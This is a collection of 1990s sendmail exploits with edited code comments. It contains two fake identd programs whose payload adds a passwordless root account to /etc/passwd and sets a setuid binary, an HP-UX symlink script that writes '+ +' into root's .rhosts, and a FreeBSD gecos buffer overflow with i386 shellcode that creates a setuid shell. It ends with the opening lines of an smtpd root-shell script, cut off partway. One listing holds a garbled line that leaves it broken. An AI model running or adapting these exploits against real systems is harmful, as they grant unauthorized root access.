* gcc ident.c -o ident
* add the following line to your /etc/inetd.conf:
* ident stream tcp nowait root /tmp/ident in.identd
* then kill -HUP inetd
*
* Not for public use or disclosure.
*
* This is a sendmail 8.6.10 attack based on a problem that 8.6.10 inherited
* from 8.6.9: sendmail blindly trusts the user-id string returned by the
* remote identd, bogus characters and newlines included, and later copies
* it into the queue file. Those newlines let the fake identd below smuggle
* extra control lines into the queue file (the Croot line and the
* R<"|...> program recipients in the payload), which sendmail acts on when
* it later processes the queued message. 8.6.10 supposedly "strips" the
* newlines before they are written, but it only converts them to spaces,
* and the code below demonstrates that quick work-around patches are never
* stable...
*
* NOTES: This hack only works when sendmail queues up the message for
* later delivery. This depends on the configuration of sendmail.cf and
* on the machine loading. If you can do something to drag the machine to
* its knees, then fire off this attack, you stand a much better chance of
* success.
*
* NOTES: If sendmail.cf is configured with Og1 and Ou1 lines (setting the
* default user to bin.bin), this exploit will not work.
*
* Also, since this only works when sendmail queues up the message for
* later delivery, the time of execution is dependent on how sendmail
* has been configured in sendmail.cf and machine load. Heavily loaded
* machines (or machines that have been intentionally flooded) have a
* greater possibility of this exploit working.
*
*/
#include <sys/types.h>
#include <sys/fcntl.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* TIMEOUT is the number of seconds to wait before closing the connection if
 * the client doesn't provide the port pairs.
 */
#define TIMEOUT 120
/* OUTPUT_BUFFER_SIZE holds the whole ident reply: up to SOCKET_BUFFER_SIZE-1
 * bytes of echoed request, the " : USERID : UNIX : " text and the payload
 * that main() appends, so it must comfortably exceed their sum. (The
 * listing's comment named a PROCINFO_BUFFER_SIZE that does not exist here.)
 */
#define OUTPUT_BUFFER_SIZE 2048
/* SOCKET_BUFFER_SIZE bounds the ident request read from the client; main()
 * reads at most SOCKET_BUFFER_SIZE-1 bytes of it.
 */
#define SOCKET_BUFFER_SIZE 100
/* Local/remote ports of the ident request. Unused in this listing: main()
 * never parses the port pair, it only echoes the request line back.
 */
unsigned short lport = 0, rport = 0;
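/*
 * Fake in.identd: inetd hands us the accepted socket on fd 0/1.  We wait
 * up to TIMEOUT seconds for the client's "lport , rport" request line and
 * answer with an ident USERID reply whose user-id field is the sendmail
 * control-line payload.  The port pair is not parsed: whatever the client
 * sent (trailing CR/LF included) is echoed back in front of
 * " : USERID : UNIX : ", exactly as in the original listing.
 *
 * Fixes relative to the listing:
 *  - the request is NUL-terminated before it is formatted; read() does not
 *    terminate, so the original handed an unterminated buffer to "%s";
 *  - select()'s result is honoured, so a silent client is dropped after
 *    TIMEOUT instead of blocking in read() forever;
 *  - the reply is built with a bounded snprintf();
 *  - the payload literal, which the listing shows line-wrapped across raw
 *    newlines (not valid C), is rejoined.  A single space is assumed at the
 *    two wrap points ("Mlocal, P=/bin/sh" and "/bin/csh >> /etc/passwd"),
 *    matching the "Mprog, P=/bin/sh" text.  The last R line is kept
 *    without a closing \"> exactly as found, although the second listing
 *    in this file does close it.
 * Always exits with status 0.
 */
int
main (void)
{
  /* The user-id sendmail will copy into its queue file.  The embedded
   * \r\n pairs are what 8.6.10 turns into spaces rather than stripping. */
  static const char payload[] =
    "Croot\r\n"
    "Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\n"
    "Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\n"
    "R<\"|/bin/echo toor::0:1:toor:/:/bin/csh >> /etc/passwd\">\r\n"
    "R<\"|/usr/bin/chmod 4755 /usr/bin/time";
  fd_set readfds;
  struct timeval timeout;
  char request[SOCKET_BUFFER_SIZE];
  char reply[OUTPUT_BUFFER_SIZE];
  ssize_t nread;
  int replylen;

  FD_ZERO (&readfds);
  FD_SET (0, &readfds);
  timeout.tv_sec = TIMEOUT;
  timeout.tv_usec = 0;
  /* 0 = timed out, -1 = error: either way there is no request to answer. */
  if (select (1, &readfds, NULL, NULL, &timeout) <= 0)
    return 0;

  nread = read (0, request, sizeof request - 1);
  if (nread <= 0)
    return 0;
  request[nread] = '\0';	/* read() does not NUL-terminate */

  replylen = snprintf (reply, sizeof reply, "%s : USERID : UNIX : %s\r\n",
		       request, payload);
  /* Never send a truncated reply.  With these buffer sizes this cannot
   * trigger, but it keeps the write bounded if the sizes are changed. */
  if (replylen < 0 || (size_t) replylen >= sizeof reply)
    return 0;
  (void) write (1, reply, (size_t) replylen);
  return 0;
}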
................................ CuT HeRe ..................................
Second Exploit follows:
/* 8.6.10 sendmail attacker
*
* gcc ident.c -o ident
* add the following line to your /etc/inetd.conf:
* ident stream tcp nowait root /tmp/ident in.identd
* then kill -HUP inetd
*
* Not for public use or disclosure.
*
* This is a sendmail 8.6.10 attack based on a problem that 8.6.10 inherited
* from 8.6.9: sendmail blindly trusts the user-id string returned by the
* remote identd, bogus characters and newlines included, and later copies
* it into the queue file. Those newlines let the fake identd below smuggle
* extra control lines into the queue file (the Croot line and the
* R<"|...> program recipients in the payload), which sendmail acts on when
* it later processes the queued message. 8.6.10 supposedly "strips" the
* newlines before they are written, but it only converts them to spaces,
* and the code below demonstrates that quick work-around patches are never
* stable...
*
* NOTES: If sendmail.cf is configured with Og1 and Ou1 lines (setting the
* default user to bin.bin), this exploit will not work.
*
* Also, since this only works when sendmail queues up the message for
* later delivery, the time of execution is dependent on how sendmail
* has been configured in sendmail.cf and machine load. Heavily loaded
* machines (or machines that have been intentionally flooded) have a
* greater possibility of this exploit working.
*
*/
#include <sys/types.h>
#include <sys/fcntl.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* TIMEOUT is the number of seconds to wait before closing the connection if
 * the client doesn't provide the port pairs.
 */
#define TIMEOUT 120
/* OUTPUT_BUFFER_SIZE holds the whole ident reply: up to SOCKET_BUFFER_SIZE-1
 * bytes of echoed request, the " : USERID : UNIX : " text and the payload
 * that main() appends, so it must comfortably exceed their sum. (The
 * listing's comment named a PROCINFO_BUFFER_SIZE that does not exist here.)
 */
#define OUTPUT_BUFFER_SIZE 2048
/* SOCKET_BUFFER_SIZE bounds the ident request read from the client; main()
 * reads at most SOCKET_BUFFER_SIZE-1 bytes of it.
 */
#define SOCKET_BUFFER_SIZE 100
/* Local/remote ports of the ident request. Unused in this listing: main()
 * never parses the port pair, it only echoes the request line back.
 */
unsigned short lport = 0, rport = 0;
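/*
 * Fake in.identd, second variant of the same 8.6.10 attack.  Identical to
 * the first listing except that the control lines in the payload are
 * separated by runs of tabs instead of \r\n, and the user-id ends with an
 * extra "\r\n$rascii done" before the format's own CR/LF.  inetd hands us
 * the accepted socket on fd 0/1; we wait up to TIMEOUT seconds for the
 * client's "lport , rport" line and echo it back, unparsed, in front of
 * " : USERID : UNIX : " and the payload.
 *
 * Fixes relative to the listing:
 *  - the request is NUL-terminated before it is formatted; read() does not
 *    terminate, so the original handed an unterminated buffer to "%s";
 *  - select()'s result is honoured, so a silent client is dropped after
 *    TIMEOUT instead of blocking in read() forever;
 *  - the reply is built with a bounded snprintf();
 *  - the payload literal, shown line-wrapped across raw newlines in the
 *    listing (not valid C), is rejoined.  Nothing is inserted at the wrap
 *    after the tab run before "Mlocal,", between "toor:/:" and "/bin/csh"
 *    (the passwd fields are "/" and "/bin/csh"), or before "$rascii"; a
 *    single space is assumed in "Mlocal, P=/bin/sh", matching the
 *    "Mprog, P=/bin/sh" text.  Tab counts are copied as shown.
 * Always exits with status 0.
 */
int
main (void)
{
  /* The user-id sendmail will copy into its queue file; tab runs separate
   * the injected control lines in this variant. */
  static const char payload[] =
    "Croot\t\t\t\t\t\t\t"
    "Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\t\t\t\t\t\t"
    "Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u\t\t\t\t\t\t"
    "R<\"|/bin/echo toor::0:1:toor:/:/bin/csh >> /etc/passwd\">\t\t\t"
    "R<\"|/usr/bin/chmod 4755 /usr/bin/time\">\r\n"
    "$rascii done";
  fd_set readfds;
  struct timeval timeout;
  char request[SOCKET_BUFFER_SIZE];
  char reply[OUTPUT_BUFFER_SIZE];
  ssize_t nread;
  int replylen;

  FD_ZERO (&readfds);
  FD_SET (0, &readfds);
  timeout.tv_sec = TIMEOUT;
  timeout.tv_usec = 0;
  /* 0 = timed out, -1 = error: either way there is no request to answer. */
  if (select (1, &readfds, NULL, NULL, &timeout) <= 0)
    return 0;

  nread = read (0, request, sizeof request - 1);
  if (nread <= 0)
    return 0;
  request[nread] = '\0';	/* read() does not NUL-terminate */

  replylen = snprintf (reply, sizeof reply, "%s : USERID : UNIX : %s\r\n",
		       request, payload);
  /* Never send a truncated reply.  With these buffer sizes this cannot
   * trigger, but it keeps the write bounded if the sizes are changed. */
  if (replylen < 0 || (size_t) replylen >= sizeof reply)
    return 0;
  (void) write (1, reply, (size_t) replylen);
  return 0;
}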
................................ CuT HeRe ..................................
HP-UX = HP-UX 9.x =
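#!/bin/sh
# HP-UX 9.x sendmail /tmp/dead.letter symlink attack (virgin HP-UX 9.x
# sendmail.cf).  Sendmail saves the body of an undeliverable message by
# appending it to /tmp/dead.letter as root; if that name is a symbolic
# link, the body is appended to the link's target instead (/etc/passwd,
# /etc/hosts.equiv, /.rhosts, ...).  This script points the link at
# root's .rhosts, mails "+ +" to a non-existent recipient, waits for
# sendmail to bounce it, then tries a remsh login as root.
# - sirsyko
#
# Changes from the listing:
#  - root's home comes from the passwd entry whose *first* field is root
#    (a bare `grep root` also matched any other entry containing "root");
#  - an empty home directory aborts instead of silently linking "/.rhosts";
#  - the leftover check uses -f/-h, so a dangling symlink that rm could not
#    remove is noticed (-f alone is false for a dangling link);
#  - ln failure and the abort paths return a non-zero exit status.

r00tDIR=`grep '^root:' /etc/passwd | cut -f6 -d:`
RunDMC=`hostname`
if [ -z "$r00tDIR" ]; then
	echo "Sorry, no root entry in /etc/passwd"
	exit 1
fi
if [ -f /tmp/dead.letter -o -h /tmp/dead.letter ]; then
	rm -f /tmp/dead.letter
fi
if [ -f /tmp/dead.letter -o -h /tmp/dead.letter ]; then
	echo "Sorry, aint gonna work"
	exit 1
fi
ln -s "${r00tDIR}/.rhosts" /tmp/dead.letter || exit 1
# Hand-rolled SMTP session; the sleeps give the server time to answer.
(
	sleep 1
	echo "helo"
	echo "mail from: noone"
	echo "rcpt to: noone@bounce"
	echo "data"
	echo "+ +"
	echo "."
	sleep 3
	echo "quit"
) | telnet ${RunDMC} 25
sleep 5
remsh ${RunDMC} -l root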
............... CuT HeRe ...............
What the r00t guys exploit does is just this:
* creates a symbolic link to the target file (in this case '.rhosts' in
root's directory) called '/tmp/dead.letter'.
* Then sends a message (containing lines you want to append) to a
non-existent user.
* Sendmail is configured (by default) to append the text of messages it
* cannot deliver to '/tmp/dead.letter', and it does so with root
* privileges. If '/tmp/dead.letter' is a symbolic link, sendmail follows
* it and appends the message to whatever file the link points at.
* If the sendmail configuration has been changed so that undeliverable mail
* is saved somewhere else, the .cf file tells you where; the same symlink
* trick then applies to that path.
8.7.5 gecos = 8.X.X <8.8.0 = TeSTed oN 8.6.12
This bug was pointed out by Mudge of L0pht on Bugtraq on Sept 1996,
excerpts follow:
A buffer overflow condition exists that allows a user to overwrite the
information in a saved stack frame. When the function returns, the saved
frame is popped off of the stack and user code can be executed. If a user
is able to alter his/her gecos field then that user can exploit a coding
flaw in sendmail to elevate their effective UID to 0.
The actual problem in the code is quite apparent.
Inside recipient.c we find the following:
char nbuf[MAXNAME + 1];
...
buildfname(pw->pw_gecos, pw->pw_name, nbuf);
The problem is that nbuf[MAXNAME + 1] is a fixed length buffer and as we
will soon see, buildfname() does not honor this. [ ..... ]
This particular problem has been fixed in Sendmail 8.8 beta.
Here is an example exploit. Apparently it writes a small script, "hack", and
runs chfn with EDITOR=./hack so that the script plants the overflow string
in the user's gecos field, then runs /usr/sbin/sendmail, which copies that
field with buildfname():
------------------------------ Cut Here ------------------------------------
/* Hi ! */
/* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0). */
/* If you have any problems with it, send letter to me. */
/* Have fun ! */
/* ----------------- Dedicated to my beautiful lady ------------------ */
/* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su */
#include <stdio.h>
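/*
 * Entry point: write the fake editor script (./hack) with make_files(),
 * then run one shell command line that makes the script executable, lets
 * chfn invoke it as $EDITOR on the gecos data, and finally runs
 * /usr/sbin/sendmail, where the overflowed gecos field is read.
 * The listing's command string was line-wrapped in the middle of "echo";
 * it is rejoined here.  Returns 0 regardless of what the commands did.
 */
int main(void)
{
  void make_files(void);	/* defined below */
  make_files();
  /* Fixed command string, no untrusted input is interpolated into it. */
  system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;"
         "echo See result in /tmp");
  return 0;
}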
/*
 * make_files: build the i386 shellcode string and write the "hack" editor
 * script that chfn will run as $EDITOR.
 *
 * NOTE(review): this listing is damaged by extraction.  The line
 * `for(i=0;i\"$1\"\n");` has lost everything between `i` and `\"$1\"`
 * (most likely an HTML '<' and the text following it were stripped), so
 * the NOP-fill loop over nop_string, the fopen() of the script file and
 * the fprintf() that writes the shellcode into it are missing.  What
 * survives is the shellcode itself, the script's trailing `touch -t ...`
 * line and the fclose().  Do not expect this block to compile as shown.
 */
void make_files()
{
int i,j;
FILE *f;
char nop_string[200];
/* Position-independent payload.  Reading the bytes against the comments:
 *  - `jmp cont` / `call geteip` / `popl %ebp` leave %ebp pointing at the
 *    addl instruction, and the 0xffffff.. labels below are offsets from
 *    that address;
 *  - the two decl instructions turn the 0x3c at 0xffffffc3(%ebp) into
 *    0x3b (';') and the 0x01 at 0xffffffd7(%ebp) into 0x00, so at run
 *    time the embedded text becomes the single NUL-terminated command
 *    "cp /bin/sh /tmp;chmod a=rsx /tmp/sh" -- presumably because those two
 *    bytes could not be carried through chfn into the gecos field;
 *  - `addl $0xffffffb4,%ebp` (-0x4c) then points %ebp at that command,
 *    %esp is set to a fixed stack address, the command's address is pushed
 *    twice and `ret` transfers to 0x80477d0 -- presumably a fixed address
 *    of a system()-like routine in the FreeBSD 2.1.0 sendmail binary; this
 *    cannot be confirmed from here.
 *  - the trailing 4 bytes (0xefbfcfa0) are presumably the saved return
 *    address overwrite.
 * 269 - sizeof(code_string) is presumably the NOP count prepended by the
 * lost loop. */
char code_string[]=
{
"\xeb\x50" /* jmp
cont */
/* geteip: */ "\x5d" /* popl
%ebp */
"\x55" /* pushl
%ebp */
"\xff\x8d\xc3\xff\xff\xff" /* decl
0xffffffc3(%ebp) */
"\xff\x8d\xd7\xff\xff\xff" /* decl
0xffffffd7(%ebp) */
"\xc3" /* ret */
/* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
/* 0xffffffc3(%ebp): */ "\x3c"
"chmod a=rsx /tmp/sh"
/* 0xffffffd7(%ebp): */ "\x01"
"-leshka-leshka-leshka-leshka-" /* reserved */
/* cont: */ "\xc7\xc4\x70\xcf\xbf\xef" /* movl
$0xefbfcf70,%esp */
"\xe8\xa5\xff\xff\xff" /* call
geteip */
"\x81\xc5\xb4\xff\xff\xff" /* addl
$0xffffffb4,%ebp  (the listing's comment read $0xb4ffffff; the
little-endian immediate is 0xffffffb4, matching the label above) */
"\x55" /* pushl %ebp */
"\x55" /* pushl %ebp */
"\x68\xd0\x77\x04\x08" /* pushl
$0x80477d0
*/
"\xc3" /* ret */
"-leshka-leshka-leshka-leshka-" /* reserved */
"\xa0\xcf\xbf\xef"
};
j=269-sizeof(code_string);
/* NOTE(review): garbled line -- the loop body, fopen() and the fprintf()
 * of the shellcode were lost between `i` and `\"$1\"` (see header). */
for(i=0;i\"$1\"\n");
/* Last line of the "hack" script: backdates the file chfn hands to it. */
fprintf(f,"touch -t 2510711313 \"$1\"\n");
fclose(f);
}
................................ Cut Here ................................
mime7to8() = 8.8.0 =
An attacker can simply create a very large message in which each line ends
with "=" and use it to overwrite the sendmail process's stack. Here the bug
is only described... why doesn't someone write an exploit?!
There is a serious bug in the mime7to8() function of sendmail 8.8.0 which
allows anyone who can send you mail to execute arbitrary code as root on
your machine. I think mime7to8() only gets invoked if you set the
undocumented "9" mailer flag. However, this flag is set by default in the
cf/mailer/local.m4 file that ships with sendmail 8.8.0. Thus, if you are
using an old V6 format configuration file from sendmail 8.7, you are
probably safe, but if you generated a new V7 configuration file, you are
probably vulnerable to this bug.
Now here are the technical details:
The inner loop of mime7to8() looks like this:
u_char *obp;
char buf[MAXLINE];
u_char obuf[MAXLINE];
....
/* quoted-printable */
obp = obuf;
while (fgets(buf, sizeof buf, e->e_dfp) != NULL)
{
if (mime_fromqp((u_char *) buf, &obp, 0, MAXLINE) == 0)
continue;
putline((char *) obuf, mci);
obp = obuf;
}
When mime_fromqp() encounters a line that ends "=\n", it chops those two
characters off and returns 0 to indicate a continuation line. This causes
the while loop to continue, reading another input line and appending its
contents to obuf. However, when the loop continues without resetting obp to
obuf, there are fewer than MAXLINE characters left in the output buffer.
This means an attacker can simply create a very large message in which each
line ends with "=". Eventually obp will move beyond the end of obuf and
start writing almost arbitrary data to the sendmail process's stack (as
long as no bytes are 0).
smtpd = 8.7-8.8.2 =
Read the exploit and don't bother:
------------------------------ Cut Here --------------------------------
#/bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd